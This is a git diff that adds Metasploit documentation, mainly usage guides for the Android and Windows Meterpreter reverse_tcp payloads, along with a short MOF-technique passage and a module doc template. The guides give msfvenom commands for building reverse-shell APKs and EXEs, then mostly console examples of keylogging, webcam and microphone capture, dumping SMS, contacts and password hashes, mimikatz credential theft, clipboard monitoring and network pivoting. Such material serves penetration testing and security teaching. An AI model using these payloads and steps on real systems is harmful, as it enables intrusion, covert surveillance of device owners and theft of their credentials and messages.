+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
+format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it.
Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
+caught by antivirus on the target.
+
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
+
diff --git a/documentation/modules/module_doc_template.md b/documentation/modules/module_doc_template.md
new file mode 100644
index 0000000000..aa1e134161
--- /dev/null
+++ b/documentation/modules/module_doc_template.md
@@ -0,0 +1,41 @@
+The following is the recommended format for module documentation.
+But feel free to add more content/sections to this.
+
+
+## Vulnerable Application
+
+ Instructions to get the vulnerable application.
+
+## Verification Steps
+
+ Example steps in this format:
+
+ 1. Install the application
+ 2. Start msfconsole
+ 3. Do: ```use [module path]```
+ 4. Do: ```run```
+ 5. You should get a shell.
+
+## Options
+
+ **Option name**
+
+ Talk about what it does, and how to use it appropriately.
+
+## Scenarios
+
+ Specific demo of using the module that might be useful in a real world scenario.
+
+ ```
+ code or console output
+ ```
+
+ For example:
+
+ To do this specific thing, here's how you do it:
+
+ ```
+ msf > use module_name
+ msf auxiliary(module_name) > set POWERLEVEL >9000
+ msf auxiliary(module_name) > exploit
+ ```
\ No newline at end of file
diff --git a/documentation/modules/payload/android/meterpreter/reverse_tcp.md b/documentation/modules/payload/android/meterpreter/reverse_tcp.md
new file mode 100644
index 0000000000..cde18f507f
--- /dev/null
+++ b/documentation/modules/payload/android/meterpreter/reverse_tcp.md
@@ -0,0 +1,457 @@
+The android/meterpreter/reverse_tcp payload is a Java-based Meterpreter that can be used on an
+Android device. It is still at an early stage of development, but there are so many things you can
+do with it already.
+
+The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
+
+## Vulnerable Application
+
+You can test android/meterpreter/reverse_tcp on these devices:
+
+**Android Emulator**
+
+An emulator is the most convenient way to test Android Meterpreter. You can try:
+
+* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal.
+* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK.
+* [GenyMotion](https://www.genymotion.com/download/) - Requires an account.
+* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - Contains a collection of pre-configured emulators.
+
+
+**A real Android device**
+
+Having a real Android device allows you to test features or vulnerabilities you don't necessarily
+have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also
+get to test it over a real network.
+
+
+## Verification Steps
+
+Currently, the most common way to use Android Meterpreter is to create it as an APK, and then
+execute it.
+
+To create the APK with msfconsole:
+
+```
+msf > use payload/android/meterpreter/reverse_tcp
+msf payload(reverse_tcp) > set LHOST 192.168.1.199
+LHOST => 192.168.1.199
+msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
+[*] Writing 8992 bytes to /tmp/android.apk...
+msf payload(reverse_tcp) >
+```
+
+To create the APK with msfvenom:
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
+
+Next, start an Android device. Upload the APK, and execute it. There are different ways to do this,
+so please refer to the Scenarios section for more information.
+
+## Important Basic Commands
+
+**pwd**
+
+The ```pwd``` command allows you to see the current directory you're in.
+
+```
+meterpreter > pwd
+/data/data/com.metasploit.stage
+```
+
+**cd**
+
+The ```cd``` command allows you to change directory. For example:
+
+```
+meterpreter > cd cache
+meterpreter > ls
+```
+
+**cat**
+
+The ```cat``` command allows you to see the contents of a file.
+
+**ls**
+
+The ```ls``` command displays items in a directory. For example:
+
+```
+meterpreter > ls
+Listing: /data/data/com.metasploit.stage/files
+==============================================
+
+Mode Size Type Last modified Name
+---- ---- ---- ------------- ----
+100444/r--r--r-- 0 fil 2016-03-08 14:56:08 -0600 rList-com.metasploit.stage.MainActivity
+```
+
+**upload**
+
+The ```upload``` command allows you to upload a file to the remote target. The ```-r``` option
+allows you to do so recursively.
+
+**download**
+
+The ```download``` command allows you to download a file from the remote target. The ```-r```
+option allows you to do so recursively.
+
+**search**
+
+The ```search``` command allows you to find files on the remote target. For example:
+
+```
+meterpreter > search -d . -f *.txt
+```
+
+**ifconfig**
+
+The ```ifconfig``` command displays the network interfaces on the remote machine.
+
+```
+meterpreter > ifconfig
+
+...
+
+Interface 10
+============
+Name : wlan0 - wlan0
+Hardware MAC : 60:f1:89:07:c2:7e
+IPv4 Address : 192.168.1.207
+IPv4 Netmask : 255.255.255.0
+IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
+IPv6 Netmask : ::
+IPv6 Address : fe80::62f1:89ff:fe07:c27e
+IPv6 Netmask : ::
+IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
+IPv6 Netmask : ::
+
+...
+```
+
+**getuid**
+
+The ```getuid``` command shows the current user that the payload is running as:
+
+```
+meterpreter > getuid
+Server username: u0_a231
+```
+
+**ps**
+
+The ```ps``` command shows a list of processes the Android device is running. For example:
+
+```
+meterpreter > ps
+
+Process List
+============
+
+ PID Name Arch User
+ --- ---- ---- ----
+ 1 /init root
+ 2 kthreadd root
+ 3 ksoftirqd/0 root
+ 7 migration/0 root
+ 8 rcu_preempt root
+ 9 rcu_bh root
+ 10 rcu_sched root
+ 11 watchdog/0 root
+ 12 watchdog/1 root
+ 13 migration/1 root
+ 14 ksoftirqd/1 root
+ 17 watchdog/2 root
+ 18 migration/2 root
+ 19 ksoftirqd/2 root
+ 22 watchdog/3 root
+ 23 migration/3 root
+
+...
+```
+
+**shell**
+
+The ```shell``` command allows you to interact with a shell:
+
+```
+meterpreter > shell
+Process 1 created.
+Channel 1 created.
+id
+uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
+```
+
+To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
+
+**sysinfo**
+
+The ```sysinfo``` command shows you basic information about the Android device.
+
+```
+meterpreter > sysinfo
+Computer : localhost
+OS : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
+Meterpreter : java/android
+```
+
+**webcam_list**
+
+The ```webcam_list``` command shows a list of webcams you could use for the ```webcam_snap```
+command. Example:
+
+```
+meterpreter > webcam_list
+1: Back Camera
+2: Front Camera
+```
+
+**webcam_snap**
+
+The ```webcam_snap``` command takes a picture from the device. You will have to use the
+```webcam_list``` command to figure out which camera to use. Example:
+
+```
+meterpreter > webcam_snap -i 2
+[*] Starting...
+[+] Got frame
+[*] Stopped
+Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
+```
+
+**record_mic**
+
+The ```record_mic``` command records audio. Good for listening to a phone conversation, as well as
+other uses. Example:
+
+```
+meterpreter > record_mic -d 20
+[*] Starting...
+[*] Stopped
+Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
+```
+
+**activity_start**
+
+The ```activity_start``` command is an execute command by starting an Android activity from a URI
+string.
+
+**check_root**
+
+The ```check_root``` command detects whether your payload is running as root or not. Example:
+
+```
+meterpreter > check_root
+[*] Device is not rooted
+```
+
+**dump_calllog**
+
+The ```dump_calllog``` command retrieves the call log from the Android device.
+
+**dump_contacts**
+
+```
+meterpreter > dump_contacts
+[*] Fetching 5 contacts into list
+[*] Contacts list saved to: contacts_dump_20160308155744.txt
+```
+
+**geolocate**
+
+The ```geolocate``` commands allows you to locate the phone by retrieving the current lat-long
+using geolocation.
+
+**wlan_geolocate**
+
+The ```wlan_geolocation``` command allows you to locate the phone by retrieving the current
+lat-long using WLAN information. Example:
+
+```
+meterpreter > wlan_geolocate
+[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
+[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.*******
+```
+
+**send_sms**
+
+The ```send_sms``` command allows you to send an SMS message. Keep in mind the phone will keep a
+copy of it, too.
+
+```
+meterpreter > send_sms -d "2674554859" -t "hello"
+[+] SMS sent - Transmission successful
+```
+
+**sms_dump**
+
+The ```sms_dump``` command allows you to retrieve SMS messages. And save them as a text file.
+For example:
+
+```
+meterpreter > dump_sms
+[*] Fetching 4 sms messages
+[*] SMS messages saved to: sms_dump_20160308163212.txt
+
+...
+
+$ cat sms_dump_20160308163212.txt
+
+=====================
+[+] SMS messages dump
+=====================
+
+Date: 2016-03-08 15:30:12 -0600
+OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
+Remote IP: 192.168.1.207
+Remote Port: 59130
+
+#1
+Type : Incoming
+Date : 2016-03-08 15:29:32
+Address : **********
+Status : NOT_RECEIVED
+Message : Hello world
+
+...
+
+```
+
+**run**
+
+The ```run``` command allows you to run a post module against the remote machine at the Meterpreter
+prompt. For example:
+
+```
+meterpreter > run post/android/capture/screen
+```
+
+## Scenarios
+
+**Uploading APK to an Emulator using install_msf_apk.sh**
+
+The Metasploit Framework comes with a script that allows you to automatically upload your APK to
+an active emulator and execute it. It requires the [Android SDK platform-tools](http://developer.android.com/sdk/installing/index.html) to run, as well as [Java](https://java.com/en/download/).
+
+To use this, follow these steps:
+
+1. Start the Android Emulator
+2. Generate the Android payload as an APK.
+3. In msfconsole, start a handler for android/meterpreter/reverse_tcp
+4. Run the installer script like this from a terminal:
+
+```
+$ tools/exploit/install_msf_apk.sh /tmp/android.apk
+```
+
+The the script will do something like this:
+
+```
+$ tools/exploit/install_msf_apk.sh /tmp/android.apk
+ adding: META-INF/ANDROIDD.SF
+ adding: META-INF/ANDROIDD.RSA
+ signing: classes.dex
+ signing: AndroidManifest.xml
+ signing: resources.arsc
+Failure
+1562 KB/s (10715 bytes in 0.006s)
+ pkg: /data/local/tmp/android.apk
+Success
+rm failed for -f, Read-only file system
+Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
+```
+
+Back in msfconsole, you should receive a session:
+
+```
+[*] Started reverse TCP handler on 192.168.1.199:4444
+[*] Starting the payload handler...
+[*] Sending stage (62432 bytes) to 192.168.1.199
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600
+
+meterpreter >
+```
+
+**Uploading APK to a real Android device using install_msf_apk.sh**
+
+On the Android device, make sure to enable Developer Options. To do this:
+
+1. Go to Settings -> About -> Software Information
+2. Tap on the Build Number section a couple of times. It should unlock Developer Options.
+3. Go back to the Settings page, you should see Developer Options.
+
+Under Developer Options, make sure to:
+
+* Enable USB debugging
+* Disable Verify apps via USB
+* Open a terminal, and type: ```adb devices```. On your Android device, you should see a prompt
+ asking you to allow the computer for debugging, click OK on that.
+* Do: ```adb devices``` again, adb should now have access.
+
+Run the installer script like this from a terminal:
+
+```
+$ tools/exploit/install_msf_apk.sh /tmp/android.apk
+```
+
+And you should get a session.
+
+
+
+**Uploading APK from a Web Server**
+
+One way to upload an APK to Android without adb is by hosting it from a web server. To do this,
+you must make sure to allow to trust "Unknown sources". The way to do this varies, but normally
+it's something like this: Settings -> Security -> Check "Unknown Sources"
+
+Once you have that changed, you'll need to:
+
+1. Generate the APK payload.
+2. Start a web server from the directory where the payload is: ```ruby -run -e httpd . -p 8181```
+3. On your Android device, open a browser, and download the APK.
+4. You should be able to find the APK from the Downloads folder, install it.
+5. After installation, you will have to manually execute it.
+
+**Reconnect Android Meterpreter from the Browser Remotely**
+
+When you have the APK payload installed on your Android device, another trick to reconnect it is to
+launch an intent from a browser. An intent is simply a term in Android development that means "an operation to be performed."
+
+Here's how you do this:
+
+1. In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job.
+2. Do: ```auxiliary/server/android_browsable_msf_launch```.
+3. Set the URIPATh if needed.
+4. Do: ```run```. At this point, the web server should be up.
+5. On your Android device, open the native web browser, and go the URL generated by the auxiliary
+ module.
+6. The Android handler should get a session like the following demo:
+
+```
+msf > use exploit/multi/handler
+msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
+PAYLOAD => android/meterpreter/reverse_tcp
+msf exploit(handler) > set LHOST 192.168.1.199
+LHOST => 192.168.1.199
+msf exploit(handler) > set EXITONSESSION false
+EXITONSESSION => false
+msf exploit(handler) > run -j
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.1.199:4444
+msf exploit(handler) > [*] Starting the payload handler...
+
+msf exploit(handler) > use auxiliary/server/android_browsable_msf_launch
+msf auxiliary(android_browsable_msf_launch) > set URIPATH /test
+URIPATH => /test
+msf auxiliary(android_browsable_msf_launch) > run
+
+[*] Using URL: http://0.0.0.0:8080/test
+[*] Local IP: http://192.168.1.199:8080/test
+[*] Server started.
+[*] Sending HTML...
+[*] Sending stage (62432 bytes) to 192.168.1.207
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.207:47523) at 2016-03-08 15:09:25 -0600
+```
diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md
new file mode 100644
index 0000000000..0b65ce91bf
--- /dev/null
+++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md
@@ -0,0 +1,714 @@
+windows/meterpreter/reverse_tcp is one of the most powerful features the Metasploit Framework has
+to offer, and there are so many things you can do with it.
+
+It allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting,
+control the webcam and microphone, etc. It has the best support for post modules, and you can
+load extensions, such as mimikatz and python interpreter, etc.
+
+windows/meterpreter/reverse_tcp is also the default payload for all Windows exploit targets.
+
+## Vulnerable Application
+
+This Meterpreter payload is suitable for the following environments:
+
+* Windows x64
+* Windows x86
+
+## Verification Steps
+
+windows/meterpreter/reverse_tcp is typically used in two different ways.
+
+First, it is typically used as a payload for an exploit. Here's how to do that:
+
+1. In msfconsole, select an exploit module
+2. Configure the options for that exploit.
+3. Do: ```set payload windows/meterpreter/reverse_tcp```
+4. Set the ```LHOST``` option, which is the IP that the payload should connect to.
+5. Do: ```exploit```. If the exploit is successful, it should execute that payload.
+
+Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally,
+you would want to do it with msfvenom. If you are old school, you have probably also heard of
+msfpayload and msfencode. msfvenom is a replacement of those.
+
+The following is a basic example of using msfvenom to to generate windows/meterpreter/reverse_tcp
+as an executable:
+
+```
+./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe
+```
+
+## Important Basic Commands
+
+**pwd command**
+
+The ```pwd``` command allows you to see the current directory you're in on the remote target.
+Example:
+
+```
+meterpreter > pwd
+C:\Users\user\Desktop
+```
+
+**cd command**
+
+The ```cd``` command allows you to change directories. Example:
+
+```
+meterpreter > cd C:\\
+meterpreter > pwd
+C:\
+```
+
+**cat command**
+
+The ```cat``` command allows you to see the content of a file:
+
+```
+meterpreter > cat C:\\file.txt
+Hello world!
+```
+
+**upload command**
+
+The ```upload``` command allows you to upload a file to the remote target. For example:
+
+```
+meterpreter > upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt
+[*] uploading : /tmp/something.txt -> C:\Users\user\Desktop\something.txt
+[*] uploaded : /tmp/something.txt -> C:\Users\user\Desktop\something.txt
+meterpreter >
+```
+
+The ```-r``` option for the command also allows you to upload recursively.
+
+**download command**
+
+The ```download``` command allows you download a file from the remote target to your machine.
+For example:
+
+```
+meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/
+[*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt
+[*] download : C:\Users\user\Desktop\something.txt -> /tmp//something.txt
+meterpreter >
+```
+
+The ```-r``` option for the command also allows you to download recursively.
+
+**search command**
+
+The ```search``` command allows you to find files on the remote file system. For example, this
+demonstrates how to find all text files in the current directory:
+
+```
+meterpreter > search -d . -f *.txt
+Found 1 result...
+ .\something.txt (5 bytes)
+```
+
+Note that without the ```-d``` option, the command will attempt to search in all drives.
+
+The ```-r``` option for the commands allows you to search recursively.
+
+**ifconfig command**
+
+The ```ifconfig``` command displays the network interfaces on the remote machine:
+
+```
+meterpreter > ifconfig
+
+Interface 1
+============
+Name : Software Loopback Interface 1
+Hardware MAC : 00:00:00:00:00:00
+MTU : 4294967295
+IPv4 Address : 127.0.0.1
+IPv4 Netmask : 255.0.0.0
+IPv6 Address : ::1
+IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
+...
+```
+
+The command ```ipconfig``` is an alias for ```ifconfig```.
+
+**getuid command**
+
+The ```getuid``` command shows you the current user that the payload is running as:
+
+```
+meterpreter > getuid
+Server username: WIN-6NH0Q8CJQVM\user
+```
+
+**execute command**
+
+The ```execute``` command allows you to execute a command or file on the remote machine.
+
+The following example will spawn a calculator:
+
+```
+meterpreter > execute -f calc.exe
+Process 2076 created.
+```
+
+To pass an argument, use the ```-a``` flag:
+
+```
+meterpreter > execute -f iexplore.exe -a http://metasploit.com
+Process 2016 created.
+```
+
+There are some options you can see to add more stealth. For example, you can use the ```-H``` flag
+to create the process hidden from view. You can also use the ```-m``` flag to execute from memory.
+
+**ps command**
+
+The ```ps``` command lists the running processes on the remote machine.
+
+**shell command**
+
+The ```shell``` command allows you to interact with the remote machine's command prompt. Example:
+
+```
+meterpreter > shell
+Process 3576 created.
+Channel 6 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+C:\Users\user\Desktop>
+```
+
+To switch back to Meterpreter, do [CTRL]+[Z] to background the channel.
+
+**sysinfo command**
+
+The ```sysinfo``` command shows you basic information about the remote machine. Example:
+
+```
+meterpreter > sysinfo
+Computer : WIN-6NH0Q8CJQVM
+OS : Windows 7 (Build 7601, Service Pack 1).
+Architecture : x86
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 2
+Meterpreter : x86/win32
+meterpreter >
+```
+
+**keyscan_start**
+
+The ```keyscan_start``` command starts the keylogging feature on the remote machine.
+
+**keyscan_dump**
+
+The ```keyscan_dump``` command is a keylogger feature. You must use the ```keyscan_start``` command
+before using this. Example:
+
+```
+meterpreter > keyscan_start
+Starting the keystroke sniffer...
+meterpreter > keyscan_dump
+Dumping captured keystrokes...
+Hello World!!
+```
+
+If you wish to stop sniffing, use the ```keyscan_stop``` command.
+
+**keyscan_stop**
+
+The ```keyscan_stop``` command stops the keylogger.
+
+**screenshot**
+
+The ```screenshot``` command takes a screenshot of the target machine.
+
+**webcam_list**
+
+The ```webcam_list``` commands shows you a list of webcams that you can control. You'll
+probably want to use this first before using any other webcam commands.
+
+**webcam_snap**
+
+The ```webcam_snap``` commands uses the selected webcam to take a picture.
+
+**webcam_stream**
+
+The ```webcam_stream``` command basically uses the ```webcam_snap``` command repeatedly to create
+the streaming effect. There is no sound.
+
+**record_mic**
+
+The ```record_mic``` command captures audio on the remote machine.
+
+**getsystem**
+
+The ```getsystem``` command attempts to elevate your privilege on the remote machine with one of
+these techniques:
+
+* Named pipe impersonation (in memory)
+* Named pipe impersonation (dropper)
+* Token duplication (in memory)
+
+Example:
+
+```
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+```
+
+**hashdump**
+
+The ```hashdump``` commands allows you to dump the Windows hashes if there are the right privileges.
+For sxample:
+
+```
+meterpreter > hashdump
+Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+HelpAssistant:1000:92a84e332fa4b09e9850257ad6826566:8fb9a6e155fd6e14a16c37427b68bbb4:::
+root:1003:633c097a37b26c0caad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
+SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b205640421f2:::
+```
+
+
+## Scenarios
+
+**Setting up for Testing**
+
+For testing purposes, if you don't want to manually generate a payload and start a multi handler
+repeatedly, you can use the auto_win32_multihandler.rc resource script in Metasploit to automate that process. Here's how you would use it:
+
+First, run the resource script:
+
+```
+$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc
+[*] Processing scripts/resource/auto_win32_multihandler.rc for ERB directives.
+[*] resource (scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes)
+lhost => 192.168.1.199
+lport => 4444
+[*] Writing 73802 bytes to /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe...
+[*] windows/meterpreter/reverse_tcp's LHOST=192.168.1.199, LPORT=4444
+[*] windows/meterpreter/reverse_tcp is at /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe
+payload => windows/meterpreter/reverse_tcp
+lhost => 192.168.1.199
+lport => 4444
+exitonsession => false
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.1.199:4444
+[*] Starting the payload handler...
+msf exploit(handler) >
+```
+
+Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there.
+Upload that payload to your test box and execute it. You should receive a connection.
+
+**Using a Post Module**
+
+One of the best things about Meterpreter is you have access to a variety of post exploitation
+modules, specifically for the multi and Windows categories. Post modules provide you with more capabilities to
+collect data from the remote machine automatically. For example, you can steal passwords
+from popular applications and enumerate or modify system settings.
+
+To use a post module from the Meterpreter prompt, simply use the ```run``` command:
+
+```
+meterpreter > run post/windows/gather/checkvm
+
+[*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine .....
+[*] This is a VMware Virtual Machine
+meterpreter >
+```
+
+It is also possible to run a post module via multiple Meterpreter sessions. To learn how, load
+the specific post module you wish to run, and enter ```info -d``` to see the basic usage in the
+documentation.
+
+
+**Using the Mimikatz Extension**
+
+[Mimikatz](https://github.com/gentilkiwi/mimikatz) is a well known tool to extract passwords, hashes, PIN code, and kerberos tickets from memory on Windows. This might actually be the first thing you want to use as soon as you get a high-privileged session, such as SYSTEM.
+
+To begin, load the extension:
+
+```
+meterpreter > load mimikatz
+Loading extension mimikatz...success.
+meterpreter >
+```
+
+This will create more commands for the Meterpreter prompt. Most of them are meant to be used to
+retrieve user names, hashes, passwords and other information:
+
+```
+Mimikatz Commands
+=================
+
+ Command Description
+ ------- -----------
+ kerberos Attempt to retrieve kerberos creds
+ livessp Attempt to retrieve livessp creds
+ mimikatz_command Run a custom command
+ msv Attempt to retrieve msv creds (hashes)
+ ssp Attempt to retrieve ssp creds
+ tspkg Attempt to retrieve tspkg creds
+ wdigest Attempt to retrieve wdigest creds
+```
+
+An example of using the ```msv``` command:
+
+```
+meterpreter > msv
+[+] Running as SYSTEM
+[*] Retrieving msv credentials
+msv credentials
+===============
+
+AuthID Package Domain User Password
+------ ------- ------ ---- --------
+0;313876 NTLM WIN-6NH0Q8CJQVM user10 lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 }
+0;313828 NTLM WIN-6NH0Q8CJQVM user10 lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 }
+0;996 Negotiate WORKGROUP WIN-6NH0Q8CJQVM$ n.s. (Credentials KO)
+0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
+0;45518 NTLM n.s. (Credentials KO)
+0;999 NTLM WORKGROUP WIN-6NH0Q8CJQVM$ n.s. (Credentials KO)
+```
+
+
+**Using the extapi Extension**
+
+The main purpose of the extapi extension is to perform advanced enumeration of the target machine. For
+example, you can enumerate things like registered services, open windows, clipboard, ADSI, WMI queries, etc.
+
+To begin, at the Meterpreter prompt, do:
+
+```
+meterpreter > load extapi
+Loading extension extapi...success.
+meterpreter >
+```
+
+One great feature of the extension is clipboard management. The Windows clipboard is interesting
+because it can store anything that is sensitive, such as files, user names, and passwords, but it is not well protected.
+
+For example, a password manager is a popular tool to store encryped passwords. It allows the user
+to create complex passwords without the need to memorize any of them. All the user needs to do is
+open the password manager, retrieve the password for a particular account by copying it, and then
+paste it on a login page.
+
+There is a security problem to the above process. When the user copies the password, it is stored
+in the operating system's clipboard. As an attacker, you can take advantage of this by starting the
+clipboard monitor from Meterpreter/extapi, and then collect whatever the user copies.
+
+To read whatever is currently stored in the target's clipboard, you can use the clipboard_get_data
+commnad:
+
+```
+meterpreter > clipboard_get_data
+Text captured at 2016-03-05 19:13:39.0170
+=========================================
+hello, world!!
+=========================================
+
+meterpreter >
+```
+
+The limitation of this command is that since you're only grabbing whatever is in the clipboard at
+the time, there is only one item to collect. However, when you start a monitor, you can collect
+whatever goes in there. To start, issue the following command:
+
+```
+meterpreter > clipboard_monitor_start
+[+] Clipboard monitor started
+meterpreter >
+```
+
+While it is monitoring, you can ask Meterpreter to dump whatever's been captured.
+
+```
+meterpreter > clipboard_monitor_dump
+Text captured at 2016-03-05 19:18:18.0466
+=========================================
+this is fun.
+=========================================
+
+Files captured at 2016-03-05 19:20:07.0525
+==========================================
+Remote Path : C:\Users\user\Desktop\cat_pic.png
+File size : 37627 bytes
+downloading : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png
+download : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png
+
+==========================================
+
+[+] Clipboard monitor dumped
+meterpreter >
+```
+
+The ```clipboard_monitor_stop``` command will also dump the captured data, and then exit.
+
+Combined with Meterpreter's keylogger, you have a very effective setup to capture the user's
+inputs.
+
+
+**Using the Python Extension**
+
+The Python extension allows you to use the remote machine's Python interpreter.
+
+To load the extension, at the Meterpreter prompt, do:
+
+```
+meterpreter > use python
+Loading extension python...success.
+```
+
+The most basic example of using the interpreter is the ```python_execute``` command:
+
+```
+meterpreter > python_execute "x = 'hello world'; print x"
+[+] Content written to stdout:
+hello world
+
+meterpreter >
+```
+
+Another way to execute Python code is from a local file by using the ```python_import``` command.
+
+To do this, first prepare for a Python script. This example should create a message.txt on the
+remote machine's desktop:
+
+
+```python
+import os
+
+user_profile = os.environ['USERPROFILE']
+
+f = open(user_profile + '\\Desktop\\message.txt', 'w+')
+f.write('hello world!')
+f.close()
+```
+
+And to run that with the command:
+
+```
+meterpreter > python_import -f /tmp/test.py
+[*] Importing /tmp/test.py ...
+[+] Command executed without returning a result
+meterpreter >
+```
+
+To learn more about the Python extension, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/Python-Extension).
+
+**Network Pivoting**
+
+There are three mains ways that you can use for moving around inside a network:
+
+ - The route command in the msf prompt
+ - The route command in the the Meterpreter prompt
+ - The portfwd command
+
+***Routing through msfconsole***
+
+The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised machine's ipconfig:
+
+```
+[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.201:49182) at 2016-03-04 20:35:31 -0600
+
+meterpreter > ipconfig
+...
+Interface 10
+============
+Name : Intel(R) PRO/1000 MT Network Connection
+Hardware MAC : 00:0c:29:86:4b:0d
+MTU : 1472
+IPv4 Address : 192.168.1.201
+IPv4 Netmask : 255.255.255.0
+IPv6 Address : 2602:30a:2c51:e660::20
+IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
+IPv6 Address : 2602:30a:2c51:e660:44a:576e:3d2c:d765
+IPv6 Netmask : ffff:ffff:ffff:ffff::
+IPv6 Address : 2602:30a:2c51:e660:94be:567f:4fe7:5da7
+IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
+IPv6 Address : fe80::44a:576e:3d2c:d765
+IPv6 Netmask : ffff:ffff:ffff:ffff::
+
+...
+
+Interface 26
+============
+Name : VPN
+Hardware MAC : 00:00:00:00:00:00
+MTU : 1400
+IPv4 Address : 192.100.0.100
+IPv4 Netmask : 255.255.255.255
+
+...
+```
+
+The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A.
+
+At the msf prompt, do:
+
+```
+msf exploit(handler) > route add 192.100.0.0 255.255.255.0 1
+[*] Route added
+```
+
+The ```1``` at the end of the route indicates the session ID, the payload that is used as a gateway to talk to other machines.
+
+So right now, we have a connection established to the VPN, and we should be able to connect to another machine from that network:
+
+```
+msf auxiliary(smb_version) > run
+
+[*] 192.100.0.101:445 - 192.100.0.101:445 is running Windows 2003 SP2 (build:3790) (name:SINN3R-QIXN9TA2) (domain:WORKGROUP)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(smb_version) >
+```
+
+Another neat trick using route is that you can also bypass the compromised host's firewall this way. For example, if the host has HTTP open, but SMB is blocked by the firewall, you can try to compromise it via HTTP first. You'll need to use the route command to talk to SMB and then try to exploit SMB.
+
+***Routing through Meterpreter***
+
+The route command in Meterpreter allows you change the routing table that is on the target machine. The way it needs to be configured is similar to the route command in msfconsole.
+
+***Routing through the portfwd command***
+
+The portfwd command allows you to talk to a remote service like it's local. For example, if you are able to compromise a host via SMB, but are not able to connect to the remote desktop service, then you can do:
+
+```
+meterpreter > portfwd add –l 3389 –p 3389 –r > target host >
+```
+
+And that should allow you to connect to remote desktop this way on the attacker's box:
+
+```
+rdesktop 127.0.0.1
+```
+
+**Meterpreter Paranoid Mode**
+
+The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to it, hence the name "paranoid mode".
+
